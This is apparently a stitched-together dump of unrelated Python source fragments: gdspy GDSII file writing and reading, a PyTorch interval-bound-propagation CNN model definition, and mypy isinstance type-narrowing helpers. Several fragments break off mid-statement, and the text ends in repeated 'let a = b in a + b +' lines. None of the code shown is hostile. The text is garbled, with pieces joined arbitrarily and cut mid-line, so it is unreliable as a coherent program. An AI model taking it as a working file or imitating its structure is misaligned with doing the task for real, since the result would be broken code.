now = datetime.datetime.today() if timestamp is None else timestamp
name = self.name if len(self.name) % 2 == 0 else (self.name + "\0")
outfile.write(
struct.pack(
">5H12h2H",
6,
0x0002,
0x0258,
28,
0x0102,
now.year,
now.month,
now.day,
now.hour,
now.minute,
now.second,
now.year,
now.month,
now.day,
now.hour,
now.minute,
now.second,
4 + len(name),
0x0206,
)
+ name.encode("ascii")
+ struct.pack(">2H", 20, 0x0305)
+ _eight_byte_real(self.precision / self.unit)
+ _eight_byte_real(self.precision)
)
if cells is None:
cells = self.cells.values()
else:
cells = [self.cells.get(c, c) for c in cells]
if len(cells) == 0:
warnings.warn("[GDSPY] Creating a GDSII file without any cells.")
for cell in cells:
cell.to_gds(outfile, self.unit / self.precision)
if binary_cells is not None:
for bc in binary_cells:
outfile.write(bc)
outfile.write(struct.pack(">2H", 4, 0x0400))
if close:
outfile.close()
def read_gds(
self,
infile,
units="skip",
rename={},
rename_template="{name}",
layers={},
datatypes={},
texttypes={},
):
"""
Read a GDSII file into this library.
Parameters
----------
infile : file, string or Path
GDSII stream file (or path) to be imported. It must be
opened for reading in binary format.
units : {'convert', 'import', 'skip'}
Controls how to scale and use the units in the imported
file. 'convert': the imported geometry is scaled to
this library units. 'import': the unit and precision in
this library are replaced by those from the imported file.
'skip': the imported geometry is not scaled and units
are not replaced; the geometry is imported in the *user
units* of the file.
rename : dictionary
Dictionary used to rename the imported cells. Keys and
values must be strings.
rename_template : string
Template string used to rename the imported cells. Appiled
only if the cell name is not in the `rename` dictionary.
Examples: 'prefix-{name}', '{name}-suffix'
layers : dictionary
Dictionary used to convert the layers in the imported cells.
Keys and values must be integers.
datatypes : dictionary
Dictionary used to convert the datatypes in the imported
cells. Keys and values must be integers.
texttypes : dictionary
Dictionary used to convert the text types in the imported
cells. Keys and values must be integers.
Returns
-------
out : `GdsLibrary`
This object.
Notes
-----
Not all features from the GDSII specification are currently
supported. A warning will be produced if any unsupported
features are found in the imported file.
"""
self._references = []
close = True
if hasattr(infile, "__fspath__"):
infile = open(infile.__fspath__(), "rb")
elif isinstance(infile, (basestring, Path)):
infile = open(infile, "rb")
else:
close = False
emitted_warnings = []
kwargs = {}
create_element = None
factor = 1
cell = None
properties = {}
attr = -1
for record in _record_reader(infile):
# LAYER
if record[0] == 0x0D:
kwargs["layer"] = layers.get(record[1][0], record[1][0])
# DATATYPE or BOXTYPE
elif record[0] == 0x0E or record[0] == 0x2E:
kwargs["datatype"] = datatypes.get(record[1][0], record[1][0])
# TEXTTYPE
elif record[0] == 0x16:
kwargs["texttype"] = texttypes.get(record[1][0], record[1][0])
# XY
elif record[0] == 0x10:
if "xy" in kwargs:
kwargs["xy"] = numpy.concatenate((kwargs["xy"], factor * record[1]))
else:
kwargs["xy"] = factor * record[1]
# WIDTH
elif record[0] == 0x0F:
kwargs["width"] = factor * abs(record[1][0])
if record[1][0] < 0:
kwargs["width_transform"] = False
# ENDEL
elif record[0] == 0x11:
if create_element is not None:
el = create_element(**kwargs)
if len(properties) > 0:
el.properties = properties
properties = {}
cell.add(el)
create_element = None
kwargs = {}
# BOUNDARY
elif record[0] == 0x08:
create_element = self._create_polygon
# PATH
elif record[0] == 0x09:
create_element = self._create_path
# BOX
elif record[0] == 0x2D:
create_element = self._create_polygon
if record[0] not in emitted_warnings:
warnings.warn(
"[GDSPY] GDSII elements of type BOX are imported as polygons.",
stacklevel=2,
)
emitted_warnings.append(record[0])
# TEXT
elif record[0] == 0x0C:
create_element = self._create_label
# SNAME
elif record[0] == 0x12:
if record[1] in rename:
name = rename[record[1]]
else:
name = rename_template.format(name=record[1])
kwargs["ref_cell"] = name
# COLROW
elif record[0] == 0x13:
kwargs["columns"] = record[1][0]
kwargs["rows"] = record[1][1]
# STRANS
elif record[0] == 0x1A:
kwargs["x_reflection"] = (int(record[1][0]) & 0x8000) > 0
if (int(record[1][0]) & 0x0006) and record[0] not in emitted_warnings:
warnings.warn(
"[GDSPY] Absolute magnification or rotation of "
"references is not supported. Transformations "
"will be interpreted as relative.",
stacklevel=2,
)
emitted_warnings.append(record[0])
# MAG
elif record[0] == 0x1B:
kwargs["magnification"] = record[1][0]
# ANGLE
elif record[0] == 0x1C:
kwargs["rotation"] = record[1][0]
# SREF
elif record[0] == 0x0A:
create_element = self._create_reference
# AREF
elif record[0] == 0x0B:
create_element = self._create_array
# STRNAME
elif record[0] == 0x06:
if record[1] in rename:
name = rename[record[1]]
else:
name = rename_template.format(name=record[1])
cell = Cell(name, exclude_from_current=True)
self.cells[name] = cell
# STRING
elif record[0] == 0x19:
kwargs["text"] = record[1]
# ENDSTR
elif record[0] == 0x07:
cell = None
# UNITS
elif record[0] == 0x03:
if units == "skip":
factor = record[1][0]
elif units == "import":
self.unit = record[1][1] / record[1][0]
self.precision = record[1][1]
factor = record[1][0]
elif units == "convert":
factor = record[1][1] / self.unit
else:
raise ValueError(
"[GDSPY] units must be one of 'convert', 'import' or 'skip'."
)
# LIBNAME
elif record[0] == 0x02:
self.name = record[1]
# PRESENTATION
elif record[0] == 0x17:
kwargs["anchor"] = GdsLibrary._import_anchors[
int(record[1][0]) & 0x000F
]
# PATHTYPE
elif record[0] == 0x21:
kwargs["ends"] = GdsLibrary._pathtype_dict.get(record[1][0], "extended")
# BGNEXTN
elif record[0] == 0x30:
kwargs["bgnextn"] = factor * record[1][0]
# ENDEXTN
elif record[0] == 0x31:
kwargs["endextn"] = factor * record[1][0]
# ENDLIB
elif record[0] == 0x04:
for ref in self._references:
if ref.ref_cell in self.cells:
ref.ref_cell = self.cells[ref.ref_cell]
# PROPATTR
elif record[0] == 0x2B:
attr = record[1][0]
# PROPVALUE
elif record[0] == 0x2C:
properties[attr] = record[1]
# Not supported
elif (
record[0] not in emitted_warnings
and record[0] not in GdsLibrary._unused_records
):
warnings.warn(
"[GDSPY] Record type {0} ({1:02X}) is not supported.".format(
GdsLibrary._record_name[record[0]], record[0]
),
stacklevel=2,
)
emitted_warnings.append(record[0])
if close:
infile.close()
return self
def _create_polygon(self, layer, datatype, xy):
return Polygon(xy[:-2].reshape((xy.size // 2 - 1, 2)), layer, datatype)
def _create_path(self, **kwargs):
xy = kwargs.pop("xy")
if "bgnextn" in kwargs or "endextn" in kwargs:
kwargs["ends"] = (kwargs.pop("bgnextn", 0), kwargs.pop("endextn", 0))
kwargs["points"] = xy.reshape((xy.size // 2, 2))
kwargs["gdsii_path"] = True
return FlexPath(**kwargs)
def _create_label(self, xy, width=None, ends=None, **kwargs):
kwargs["position"] = xy
return Label(**kwargs)
def _create_reference(self, **kwargs):
kwargs["origin"] = kwargs.pop("xy")
kwargs["ignore_missing"] = True
ref = CellReference(**kwargs)
ref.ref_cell = kwargs["ref_cell"]
self._references.append(ref)
return ref
def _create_array(self, **kwargs):
xy = kwargs.pop("xy")
kwargs["origin"] = xy[0:2]
if "x_reflection" in kwargs:
if "rotation" in kwargs:
sa = -numpy.sin(kwargs["rotation"] * numpy.pi / 180.0)
ca = numpy.cos(kwargs["rotation"] * numpy.pi / 180.0)
x2 = (xy[2] - xy[0]) * ca - (xy[3] - xy[1]) * sa + xy[0]
y3 = (xy[4] - xy[0]) * sa + (xy[5] - xy[1]) * ca + xy[1]
else:
x2 = xy[2]
y3 = xy[5]
if kwargs["x_reflection"]:
y3 = 2 * xy[1] - y3
kwargs["spacing"] = (
(x2 - xy[0]) / kwargs["columns"],
(y3 - xy[1]) / kwargs["rows"],
)
else:
kwargs["spacing"] = (
(xy[2] - xy[0]) / kwargs["columns"],
(xy[5] - xy[1]) / kwargs["rows"],
)
kwargs["ignore_missing"] = True
ref = CellArray(**kwargs)
ref.ref_cell = kwargs["ref_cell"]
self._references.append(ref)
return ref
def top_level(self):
"""
Output the top level cells from the GDSII | |
<reponame>AlexMeinke/Provable-OOD-Detection
import torch
import torch.nn as nn
import copy
from torch.nn import functional as F
import utils.models.modules_ibp as modules_ibp
class CNN_IBP(nn.Module):
def __init__(self, dset_in_name='MNIST', size='L', width=None, last_bias=True, num_classes=None, last_layer_neg=False):
super().__init__()
if dset_in_name == 'MNIST':
self.color_channels = 1
self.hw = 28
num_classes = 10 if num_classes is None else num_classes
elif dset_in_name == 'CIFAR10' or dset_in_name == 'SVHN':
self.color_channels = 3
self.hw = 32
num_classes = 10 if num_classes is None else num_classes
elif dset_in_name == 'CIFAR100':
self.color_channels = 3
self.hw = 32
num_classes = 100 if num_classes is None else num_classes
elif dset_in_name == 'RImgNet':
self.color_channels = 3
self.hw = 224
num_classes = 9 if num_classes is None else num_classes
else:
raise ValueError(f'{dset_in_name} dataset not supported.')
self.num_classes = num_classes
self.size = size
self.width = width
if last_layer_neg:
last_layer_type = modules_ibp.LinearI_Neg
else:
last_layer_type = modules_ibp.LinearI
self.last_layer_type = last_layer_type
if size == 'L':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 64, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(64, 64, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(64, 128, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(128*(self.hw//2)**2, 512)
self.A6 = modules_ibp.ReLUI()
self.L7 = last_layer_type(512, self.num_classes, bias=last_bias)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
)
self.__name__ = 'CNN_L_' + dset_in_name
elif size == 'XL':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128, 256, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(256*(self.hw//2)**2, 512)
self.A6 = modules_ibp.ReLUI()
self.L7 = modules_ibp.LinearI(512, 512)
self.A7 = modules_ibp.ReLUI()
self.L8 = last_layer_type(512, self.num_classes, bias=last_bias)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
self.A7,
self.L8,
)
self.__name__ = 'CNN_XL_' + dset_in_name
elif size == 'XL_b':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128, 256, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(256*(self.hw//2)**2, 512)
self.A6 = modules_ibp.ReLUI()
self.L7 = last_layer_type(512, self.num_classes, bias=last_bias)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
)
self.__name__ = 'CNN_XL_b_' + dset_in_name
elif size == 'C1':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128, 256, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(256*(self.hw//2)**2, 512)
self.A6 = modules_ibp.ReLUI()
self.L7 = last_layer_type(512, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
)
self.__name__ = 'CNN_C1_' + dset_in_name
elif size == 'C2':
self.width = 2
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128*self.width, 128*self.width, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(256*self.width*(self.hw//2)**2, 512*self.width)
self.A6 = modules_ibp.ReLUI()
self.L7 = last_layer_type(512*self.width, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
)
self.__name__ = f'CNN_C2-{self.width}_' + dset_in_name
elif size == 'C3':
self.width = 2
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(256*self.width*(self.hw//2)**2, 512)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(512, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_C3-{self.width}_' + dset_in_name
elif size == 'C3s':
self.width = 2
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.pool = modules_ibp.AvgPool2dI(2)
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(256*self.width*(self.hw//4)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.pool,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_C3s-{self.width}_' + dset_in_name
elif size == 'S':
self.width = 1
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.pool = modules_ibp.AvgPool2dI(2)
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(256*self.width*(self.hw//4)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.pool,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_S-{self.width}_' + dset_in_name
elif size == 'SR':
self.width = 1
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.pool1 = modules_ibp.AvgPool2dI(2)
self.C2 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.pool2 = modules_ibp.AvgPool2dI(2)
self.C3 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.pool3 = modules_ibp.AvgPool2dI(2)
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(256*self.width*(self.hw//16)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = nn.ModuleList([self.C1,
self.A1,
self.pool1,
self.C2,
self.A2,
self.pool2,
self.C3,
self.A3,
self.pool3,
self.F,
self.L4,
self.A4,
self.L5,
])
self.__name__ = f'CNN_S-{self.width}_' + dset_in_name
elif size == 'SR2':
self.width = 1
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.pool2 = modules_ibp.AvgPool2dI(2)
self.C3 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.pool3 = modules_ibp.AvgPool2dI(2)
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(256*self.width*(self.hw//8)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.pool2,
self.C3,
self.A3,
self.pool3,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_S-{self.width}_' + dset_in_name
elif size == 'XS':
self.width = 1
self.C1 = modules_ibp.Conv2dI(self.color_channels, 64*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(64*self.width, 128*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128*self.width, 128*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.pool = modules_ibp.AvgPool2dI(2)
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(128*self.width*(self.hw//4)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.pool,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_S-{self.width}_' + dset_in_name
elif size == 'C4':
self.width = 1
self.C1 = modules_ibp.Conv2dI(self.color_channels, 512*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(512*self.width, 1024*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(1024*self.width, 512*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(512*self.width*(self.hw//2)**2, 128)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(128, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_C4-{self.width}_' + dset_in_name
elif size == 'C5':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 512, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(512, 512, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(512, 512, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(512, 512, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(512, 256, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(256*(self.hw//2)**2, 512)
self.A6 = modules_ibp.ReLUI()
self.L7 = last_layer_type(512, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
)
self.__name__ = 'CNN_C5_' + dset_in_name
elif size == 'C6':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128, 256, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(256, | |
dict keyed by the nodes' literal_hash
# field instead.
# NB: This should be `TypeMap = Optional[Dict[Node, Type]]`!
# But see https://github.com/python/mypy/issues/1637
TypeMap = Dict[Node, Type]
def conditional_type_map(expr: Node,
current_type: Optional[Type],
proposed_type: Optional[Type],
*,
weak: bool = False
) -> Tuple[TypeMap, TypeMap]:
"""Takes in an expression, the current type of the expression, and a
proposed type of that expression.
Returns a 2-tuple: The first element is a map from the expression to
the proposed type, if the expression can be the proposed type. The
second element is a map from the expression to the type it would hold
if it was not the proposed type, if any."""
if proposed_type:
if current_type:
if is_proper_subtype(current_type, proposed_type):
return {expr: proposed_type}, None
elif not is_overlapping_types(current_type, proposed_type):
return None, {expr: current_type}
else:
remaining_type = restrict_subtype_away(current_type, proposed_type)
return {expr: proposed_type}, {expr: remaining_type}
else:
return {expr: proposed_type}, {}
else:
# An isinstance check, but we don't understand the type
if weak:
return {expr: AnyType()}, {expr: current_type}
else:
return {}, {}
def is_literal_none(n: Node) -> bool:
return isinstance(n, NameExpr) and n.fullname == 'builtins.None'
def and_conditional_maps(m1: TypeMap, m2: TypeMap) -> TypeMap:
"""Calculate what information we can learn from the truth of (e1 and e2)
in terms of the information that we can learn from the truth of e1 and
the truth of e2.
"""
if m1 is None or m2 is None:
# One of the conditions can never be true.
return None
# Both conditions can be true; combine the information. Anything
# we learn from either conditions's truth is valid. If the same
# expression's type is refined by both conditions, we somewhat
# arbitrarily give precedence to m2. (In the future, we could use
# an intersection type.)
result = m2.copy()
m2_keys = set(n2.literal_hash for n2 in m2)
for n1 in m1:
if n1.literal_hash not in m2_keys:
result[n1] = m1[n1]
return result
def or_conditional_maps(m1: TypeMap, m2: TypeMap) -> TypeMap:
"""Calculate what information we can learn from the truth of (e1 or e2)
in terms of the information that we can learn from the truth of e1 and
the truth of e2.
"""
if m1 is None:
return m2
if m2 is None:
return m1
# Both conditions can be true. Combine information about
# expressions whose type is refined by both conditions. (We do not
# learn anything about expressions whose type is refined by only
# one condition.)
result = {}
for n1 in m1:
for n2 in m2:
if n1.literal_hash == n2.literal_hash:
result[n1] = UnionType.make_simplified_union([m1[n1], m2[n2]])
return result
def find_isinstance_check(node: Node,
type_map: Dict[Node, Type],
weak: bool=False
) -> Tuple[TypeMap, TypeMap]:
"""Find any isinstance checks (within a chain of ands). Includes
implicit and explicit checks for None.
Return value is a map of variables to their types if the condition
is true and a map of variables to their types if the condition is false.
If either of the values in the tuple is None, then that particular
branch can never occur.
Guaranteed to not return None, None. (But may return {}, {})
"""
if isinstance(node, CallExpr):
if refers_to_fullname(node.callee, 'builtins.isinstance'):
expr = node.args[0]
if expr.literal == LITERAL_TYPE:
vartype = type_map[expr]
type = get_isinstance_type(node.args[1], type_map)
return conditional_type_map(expr, vartype, type, weak=weak)
elif (isinstance(node, ComparisonExpr) and any(is_literal_none(n) for n in node.operands) and
experiments.STRICT_OPTIONAL):
# Check for `x is None` and `x is not None`.
is_not = node.operators == ['is not']
if is_not or node.operators == ['is']:
if_vars = {} # type: Dict[Node, Type]
else_vars = {} # type: Dict[Node, Type]
for expr in node.operands:
if expr.literal == LITERAL_TYPE and not is_literal_none(expr) and expr in type_map:
# This should only be true at most once: there should be
# two elements in node.operands, and at least one of them
# should represent a None.
vartype = type_map[expr]
if_vars, else_vars = conditional_type_map(expr, vartype, NoneTyp(), weak=weak)
break
if is_not:
if_vars, else_vars = else_vars, if_vars
return if_vars, else_vars
elif isinstance(node, RefExpr):
# Restrict the type of the variable to True-ish/False-ish in the if and else branches
# respectively
vartype = type_map[node]
if_type = true_only(vartype)
else_type = false_only(vartype)
ref = node # type: Node
if_map = {ref: if_type} if not isinstance(if_type, UninhabitedType) else None
else_map = {ref: else_type} if not isinstance(else_type, UninhabitedType) else None
return if_map, else_map
elif isinstance(node, OpExpr) and node.op == 'and':
left_if_vars, left_else_vars = find_isinstance_check(
node.left,
type_map,
weak,
)
right_if_vars, right_else_vars = find_isinstance_check(
node.right,
type_map,
weak,
)
# (e1 and e2) is true if both e1 and e2 are true,
# and false if at least one of e1 and e2 is false.
return (and_conditional_maps(left_if_vars, right_if_vars),
or_conditional_maps(left_else_vars, right_else_vars))
elif isinstance(node, OpExpr) and node.op == 'or':
left_if_vars, left_else_vars = find_isinstance_check(
node.left,
type_map,
weak,
)
right_if_vars, right_else_vars = find_isinstance_check(
node.right,
type_map,
weak,
)
# (e1 or e2) is true if at least one of e1 or e2 is true,
# and false if both e1 and e2 are false.
return (or_conditional_maps(left_if_vars, right_if_vars),
and_conditional_maps(left_else_vars, right_else_vars))
elif isinstance(node, UnaryExpr) and node.op == 'not':
left, right = find_isinstance_check(node.expr, type_map, weak)
return right, left
# Not a supported isinstance check
return {}, {}
def get_isinstance_type(node: Node, type_map: Dict[Node, Type]) -> Type:
type = type_map[node]
if isinstance(type, TupleType):
all_types = type.items
else:
all_types = [type]
types = [] # type: List[Type]
for type in all_types:
if isinstance(type, FunctionLike):
if type.is_type_obj():
# Type variables may be present -- erase them, which is the best
# we can do (outside disallowing them here).
type = erase_typevars(type.items()[0].ret_type)
types.append(type)
if len(types) == 0:
return None
elif len(types) == 1:
return types[0]
else:
return UnionType(types)
def expand_node(defn: Node, map: Dict[TypeVarId, Type]) -> Node:
visitor = TypeTransformVisitor(map)
return defn.accept(visitor)
def expand_func(defn: FuncItem, map: Dict[TypeVarId, Type]) -> FuncItem:
return cast(FuncItem, expand_node(defn, map))
class TypeTransformVisitor(TransformVisitor):
def __init__(self, map: Dict[TypeVarId, Type]) -> None:
super().__init__()
self.map = map
def type(self, type: Type) -> Type:
return expand_type(type, self.map)
def is_unsafe_overlapping_signatures(signature: Type, other: Type) -> bool:
"""Check if two signatures may be unsafely overlapping.
Two signatures s and t are overlapping if both can be valid for the same
statically typed values and the return types are incompatible.
Assume calls are first checked against 'signature', then against 'other'.
Thus if 'signature' is more general than 'other', there is no unsafe
overlapping.
TODO If argument types vary covariantly, the return type may vary
covariantly as well.
"""
if isinstance(signature, CallableType):
if isinstance(other, CallableType):
# TODO varargs
# TODO keyword args
# TODO erasure
# TODO allow to vary covariantly
# Check if the argument counts are overlapping.
min_args = max(signature.min_args, other.min_args)
max_args = min(len(signature.arg_types), len(other.arg_types))
if min_args > max_args:
# Argument counts are not overlapping.
return False
# Signatures are overlapping iff if they are overlapping for the
# smallest common argument count.
for i in range(min_args):
t1 = signature.arg_types[i]
t2 = other.arg_types[i]
if not is_overlapping_types(t1, t2):
return False
# All arguments types for the smallest common argument count are
# overlapping => the signature is overlapping. The overlapping is
# safe if the return types are identical.
if is_same_type(signature.ret_type, other.ret_type):
return False
# If the first signature has more general argument types, the
# latter will never be called
if is_more_general_arg_prefix(signature, other):
return False
return not is_more_precise_signature(signature, other)
return True
def is_more_general_arg_prefix(t: FunctionLike, s: FunctionLike) -> bool:
"""Does t have wider arguments than s?"""
# TODO should an overload with additional items be allowed to be more
# general than one with fewer items (or just one item)?
# TODO check argument kinds
if isinstance(t, CallableType):
if isinstance(s, CallableType):
return all(is_proper_subtype(args, argt)
for argt, args in zip(t.arg_types, s.arg_types))
elif isinstance(t, FunctionLike):
if isinstance(s, FunctionLike):
if len(t.items()) == len(s.items()):
return all(is_same_arg_prefix(items, itemt)
for items, itemt in zip(t.items(), s.items()))
return False
def is_same_arg_prefix(t: CallableType, s: CallableType) -> bool:
# TODO check argument kinds
return all(is_same_type(argt, args)
for argt, args in zip(t.arg_types, s.arg_types))
def is_more_precise_signature(t: CallableType, s: CallableType) -> bool:
"""Is t more precise than s?
A signature t is more precise than s if all argument types and | |
+ b +
let a = b in a + b +
let a = b in a + b +
